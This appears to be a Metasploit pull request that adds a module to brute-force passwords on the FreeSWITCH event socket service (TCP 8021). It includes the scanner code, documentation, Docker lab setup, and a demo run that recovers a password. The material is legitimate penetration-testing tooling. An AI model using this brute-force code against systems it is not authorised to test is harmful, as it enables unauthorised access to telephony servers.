### PR TITLE
Add FreeSwitch Login auxiliary module

### DIFF
--- a/documentation/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.md
+++ b/documentation/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.md
@@ -12,6 +12,7 @@ This module has been tested successfully on FreeSWITCH versions:
 
 This module is a login utility to find the password of the FreeSWITCH event socket service by bruteforcing the login interface.
 Note that this service does not require a username to log in; login is done purely via supplying a valid password.
+This module will stops as soon as a valid password is found.
 
 This service is enabled by default and listens on TCP port 8021 on the local network interface.
 

--- a/documentation/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.md
+++ b/documentation/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.md
@@ -1,16 +1,19 @@
-## Description
-
-This module is a login utility to find the password of the FreeSWITCH event socket service by bruteforcing the login interface. Note that this service does not require a username to log in; login is done purely via supplying a valid password.
-
-This service is enabled by default and listens on TCP port 8021 on the local network interface.
-
 ## Vulnerable Application
-[FreeSWITCH](https://freeswitch.com/) is a free and open-source software defined telecommunications stack for real-time communication, WebRTC, telecommunications, video, and Voice over Internet Protocol.
+[FreeSWITCH](https://freeswitch.com/) is a free and open-source software defined telecommunications stack for real-time communication,
+WebRTC, telecommunications, video, and Voice over Internet Protocol.
 
-The [Event Socket](https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket) `mod_event_socket` is a TCP based interface to control FreeSWITCH and is enabled by default.
+The [Event Socket](https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket) `mod_event_socket` is a TCP based interface to
+control FreeSWITCH and is enabled by default.
 
 This module has been tested successfully on FreeSWITCH versions:
 * 1.10.7-release-19-883d2cb662~64bit on Debian 10.11 (buster)
+
+### Description
+
+This module is a login utility to find the password of the FreeSWITCH event socket service by bruteforcing the login interface.
+Note that this service does not require a username to log in; login is done purely via supplying a valid password.
+
+This service is enabled by default and listens on TCP port 8021 on the local network interface.
 
 Source and Installers:
 * [Source Code Repository](https://github.com/signalwire/freeswitch)

--- a/documentation/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.md
+++ b/documentation/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.md
@@ -1,0 +1,61 @@
+## Description
+
+This module is a login utility to find the password of the FreeSWITCH event socket service by bruteforcing the login interface. Note that this service does not require a username to log in; login is done purely via supplying a valid password.
+
+This service is enabled by default and listens on TCP port 8021 on the local network interface.
+
+## Vulnerable Application
+[FreeSWITCH](https://freeswitch.com/) is a free and open-source software defined telecommunications stack for real-time communication, WebRTC, telecommunications, video, and Voice over Internet Protocol.
+
+The [Event Socket](https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket) `mod_event_socket` is a TCP based interface to control FreeSWITCH and is enabled by default.
+
+This module has been tested successfully on FreeSWITCH versions:
+* 1.10.7-release-19-883d2cb662~64bit on Debian 10.11 (buster)
+
+Source and Installers:
+* [Source Code Repository](https://github.com/signalwire/freeswitch)
+* [Installers](https://freeswitch.org/confluence/display/FREESWITCH/Installation)
+* [Virtual Machine](https://freeswitch.com/index.php/fs-virtual-machine/)
+* [Docker](https://github.com/drachtio/docker-drachtio-freeswitch-mrf)
+
+Docker installation:
+```
+docker pull drachtio/drachtio-freeswitch-mrf
+docker run -d --rm --name FS1 --net=host \
+-v /home/deploy/log:/usr/local/freeswitch/log  \
+-v /home/deploy/sounds:/usr/local/freeswitch/sounds \
+-v /home/deploy/recordings:/usr/local/freeswitch/recordings \
+drachtio/drachtio-freeswitch-mrf freeswitch --sip-port 5038 --tls-port 5039 --rtp-range-start 20000 --rtp-range-end 21000 --password hunter
+```
+
+## Verification Steps
+1. Do: `use auxiliary/scanner/misc/freeswitch_event_socket_login`
+2. Do: `set RHOSTS [ips]`
+3. Do: `set PASS_FILE /home/kali/passwords.txt`
+4. Do: `run`
+
+## Options
+### PASS_FILE
+The file containing a list of passwords to try logging in with.
+
+## Scenarios
+### FreeSWITCH 1.10.7 Linux Debian 10.11 (Docker Image)
+```
+msf6 > use auxiliary/scanner/misc/freeswitch_event_socket_login
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > set RHOSTS 192.168.56.1
+RHOSTS => 192.168.56.1
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > set PASS_FILE /home/kali/passwords.txt
+PASS_FILE => /home/kali/passwords.txt
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > run
+
+[!] 192.168.56.1:8021        - No active DB -- Credential data will not be saved!
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: ClueCon (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: admin (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 123456 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 12345 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 123456789 (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: password (Incorrect: -ERR invalid)
+[+] 192.168.56.1:8021        - 192.168.56.1:8021 - Login Successful: hunter (Successful: +OK accepted)
+[*] 192.168.56.1:8021        - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/lib/metasploit/framework/login_scanner/freeswitch_event_socket.rb
+++ b/lib/metasploit/framework/login_scanner/freeswitch_event_socket.rb
@@ -1,0 +1,80 @@
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+require 'metasploit/framework/tcp/client'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with FreeSWITCH EventSocket.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+
+      class FreeswitchEventSocket
+        include Metasploit::Framework::LoginScanner::Base
+        include Metasploit::Framework::LoginScanner::RexSocket
+        include Metasploit::Framework::Tcp::Client
+
+        DEFAULT_PORT         = 8021
+        LIKELY_PORTS         = [ DEFAULT_PORT ]
+        LIKELY_SERVICE_NAMES = [ 'freeswitch' ]
+        PRIVATE_TYPES        = [ :password ]
+        REALM_KEY            = nil
+
+        # This method attempts a single login with a single credential against the target
+        # @param credential [Credential] The credential object to attempt to login with
+        # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
+        def attempt_login(credential)
+          result_options = {
+            credential: credential,
+            status: Metasploit::Model::Login::Status::INCORRECT,
+            host: host,
+            port: port,
+            protocol: 'tcp',
+            service_name: 'freeswitch'
+          }
+
+          disconnect if self.sock
+
+          begin
+            connect
+            select([sock], nil, nil, 0.4)
+
+            sock.get_once
+            sock.put("auth #{credential.private}\n\n")
+
+            /Reply-Text: (?<reply>.*)/ =~ sock.get_once
+            result_options[:proof] = reply
+
+            # Invalid password - ( -ERR invalid\n\n )
+            # Valid password   - ( +OK accepted\n\n )
+
+            if result_options[:proof] && result_options[:proof] =~ /-ERR invalid/i
+              result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
+            elsif result_options[:proof] && result_options[:proof][/\+OK accepted/]
+              result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
+            end
+
+          rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE => e
+            result_options.merge!(
+              proof: e.message,
+              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+            )
+          end
+          disconnect if self.sock
+          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+        end
+
+        private
+
+        # (see Base#set_sane_defaults)
+        def set_sane_defaults
+          self.connection_timeout  ||= 10
+          self.port                ||= DEFAULT_PORT
+          self.max_send_size       ||= 0
+          self.send_delay          ||= 0
+        end
+      end
+    end
+  end
+end

--- a/lib/metasploit/framework/login_scanner/freeswitch_event_socket.rb
+++ b/lib/metasploit/framework/login_scanner/freeswitch_event_socket.rb
@@ -49,13 +49,13 @@ module Metasploit
             # Invalid password - ( -ERR invalid\n\n )
             # Valid password   - ( +OK accepted\n\n )
 
-            if result_options[:proof] && result_options[:proof] =~ /-ERR invalid/i
+            if result_options[:proof]&.include?('-ERR invalid')
               result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
-            elsif result_options[:proof] && result_options[:proof][/\+OK accepted/]
+            elsif result_options[:proof]&.include?('+OK accepted')
               result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
             end
 
-          rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE => e
+          rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE, Rex::StreamClosedError => e
             result_options.merge!(
               proof: e.message,
               status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT

--- a/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb
+++ b/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::AuthBrute
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -58,14 +59,6 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(ip)
-    @check = check_host(ip)
-    case @check.code
-    when 'safe'
-      fail_with(Failure::NoAccess, @check.reason)
-    when 'unknown'
-      fail_with(Failure::Unknown, @check.reason)
-    end
-
     cred_collection = Metasploit::Framework::PrivateCredentialCollection.new(
       password: datastore['PASSWORD'],
       pass_file: datastore['PASS_FILE']
@@ -103,6 +96,8 @@ class MetasploitModule < Msf::Auxiliary
         vprint_error("LOGIN FAILED: #{result.credential.private} (#{result.status}: #{result.proof.strip})")
       end
     end
+  rescue NoMethodError => e
+    fail_with(Failure::Unknown, e.message)
   end
 
   def check_host(_ip)

--- a/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb
+++ b/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Auxiliary
       host: ip,
       port: rport,
       cred_details: cred_collection,
-      stop_on_success: datastore['STOP_ON_SUCCESS'],
+      stop_on_success: true, # this will have no effect due to the scanner behaviour when scanning without username
       connection_timeout: 10
     )
 

--- a/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb
+++ b/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb
@@ -54,7 +54,8 @@ class MetasploitModule < Msf::Auxiliary
     # freeswitch does not have an username, there's only password
     deregister_options(
       'DB_ALL_CREDS', 'DB_ALL_USERS', 'DB_SKIP_EXISTING', 'BLANK_PASSWORDS',
-      'USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'PASSWORD_SPRAY'
+      'USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE',
+      'PASSWORD_SPRAY', 'STOP_ON_SUCCESS'
     )
   end
 

--- a/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb
+++ b/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb
@@ -1,0 +1,123 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/freeswitch_event_socket'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'FreeSWITCH Event Socket Login',
+        'Description' => %q{
+          This module tests FreeSWITCH Event Socket logins on a range of
+          machines and report successful attempts.
+        },
+        'Author' => [
+          'krastanoel'
+        ],
+        'References' => [
+          ['URL', 'https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket']
+        ],
+        'DefaultOptions' => { 'VERBOSE' => false },
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_RESTARTS],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8021),
+        OptString.new('PASSWORD', [false, 'FreeSWITCH event socket default password', 'ClueCon']),
+        OptPath.new('PASS_FILE',
+                    [
+                      false,
+                      'The file that contains a list of of probable passwords.',
+                      File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')
+                    ])
+      ]
+    )
+
+    # freeswitch does not have an username, there's only password
+    deregister_options(
+      'DB_ALL_CREDS', 'DB_ALL_USERS', 'DB_SKIP_EXISTING', 'BLANK_PASSWORDS',
+      'USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'PASSWORD_SPRAY'
+    )
+  end
+
+  def run_host(ip)
+    @check = check_host(ip)
+    case @check.code
+    when 'safe'
+      fail_with(Failure::NoAccess, @check.reason)
+    when 'unknown'
+      fail_with(Failure::Unknown, @check.reason)
+    end
+
+    cred_collection = Metasploit::Framework::PrivateCredentialCollection.new(
+      password: datastore['PASSWORD'],
+      pass_file: datastore['PASS_FILE']
+    )
+    cred_collection = prepend_db_passwords(cred_collection)
+
+    scanner = Metasploit::Framework::LoginScanner::FreeswitchEventSocket.new(
+      host: ip,
+      port: rport,
+      cred_details: cred_collection,
+      stop_on_success: datastore['STOP_ON_SUCCESS'],
+      connection_timeout: 10
+    )
+
+    scanner.scan! do |result|
+      credential_data = result.to_h
+      credential_data.merge!(
+        module_fullname: fullname,
+        workspace_id: myworkspace_id
+      )
+
+      if result.success?
+        credential_data.delete(:username) # This service uses no username
+        credential_core = create_credential(credential_data)
+        credential_data[:core] = credential_core
+        create_credential_login(credential_data)
+
+        if datastore['VERBOSE']
+          vprint_good("Login Successful: #{result.credential.private} (#{result.status}: #{result.proof.strip})")
+        else
+          print_good("Login Successful: #{result.credential.private}")
+        end
+      else
+        invalidate_login(credential_data)
+        vprint_error("LOGIN FAILED: #{result.credential.private} (#{result.status}: #{result.proof.strip})")
+      end
+    end
+  end
+
+  def check_host(_ip)
+    connect
+    banner = sock.get
+    disconnect(sock)
+
+    if banner.include?('Access Denied, go away.') || banner.include?('text/rude-rejection')
+      return Exploit::CheckCode::Safe('Access denied by network ACL')
+    end
+
+    unless banner.include?('Content-Type: auth/request')
+      return Exploit::CheckCode::Unknown('Unable to determine the service fingerprint')
+    end
+
+    return Exploit::CheckCode::Appears
+  end
+end

--- a/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb
+++ b/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb
@@ -88,17 +88,15 @@ class MetasploitModule < Msf::Auxiliary
         create_credential_login(credential_data)
 
         if datastore['VERBOSE']
-          vprint_good("Login Successful: #{result.credential.private} (#{result.status}: #{result.proof.strip})")
+          vprint_good("Login Successful: #{result.credential.private} (#{result.status}: #{result.proof&.strip})")
         else
           print_good("Login Successful: #{result.credential.private}")
         end
       else
         invalidate_login(credential_data)
-        vprint_error("LOGIN FAILED: #{result.credential.private} (#{result.status}: #{result.proof.strip})")
+        vprint_error("LOGIN FAILED: #{result.credential.private} (#{result.status}: #{result.proof&.strip})")
       end
     end
-  rescue NoMethodError => e
-    fail_with(Failure::Unknown, e.message)
   end
 
   def check_host(_ip)


### PR DESCRIPTION
This module is a login utility to find the password of the FreeSWITCH event socket service by bruteforcing the login interface. Note that this service does not require a username to log in; login is done purely via supplying a valid password.

## Docker Installation
```
docker pull drachtio/drachtio-freeswitch-mrf
docker run -d --rm --name FS1 --net=host \
-v /home/deploy/log:/usr/local/freeswitch/log  \
-v /home/deploy/sounds:/usr/local/freeswitch/sounds \
-v /home/deploy/recordings:/usr/local/freeswitch/recordings \
drachtio/drachtio-freeswitch-mrf freeswitch --sip-port 5038 --tls-port 5039 --rtp-range-start 20000 --rtp-range-end 21000 --password hunter
```

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/misc/freeswitch_event_socket_login`
- [ ] `set RHOSTS [ips]`
- [ ] `run`
- [ ] **Verify** if the login succeed

## Demo
FreeSWITCH 1.10.7 Linux Debian 10 (buster)
```
msf6 > use auxiliary/scanner/misc/freeswitch_event_socket_login
msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > set RHOSTS 192.168.56.1
RHOSTS => 192.168.56.1
msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > set PASS_FILE /home/kali/passwords.txt
PASS_FILE => /home/kali/passwords.txt
msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > run

[!] 192.168.56.1:8021        - No active DB -- Credential data will not be saved!
[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: ClueCon (Incorrect: -ERR invalid)
[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: admin (Incorrect: -ERR invalid)
[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 123456 (Incorrect: -ERR invalid)
[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 12345 (Incorrect: -ERR invalid)
[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 123456789 (Incorrect: -ERR invalid)
[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: password (Incorrect: -ERR invalid)
[+] 192.168.56.1:8021        - 192.168.56.1:8021 - Login Successful: hunter (Successful: +OK accepted)
[*] 192.168.56.1:8021        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```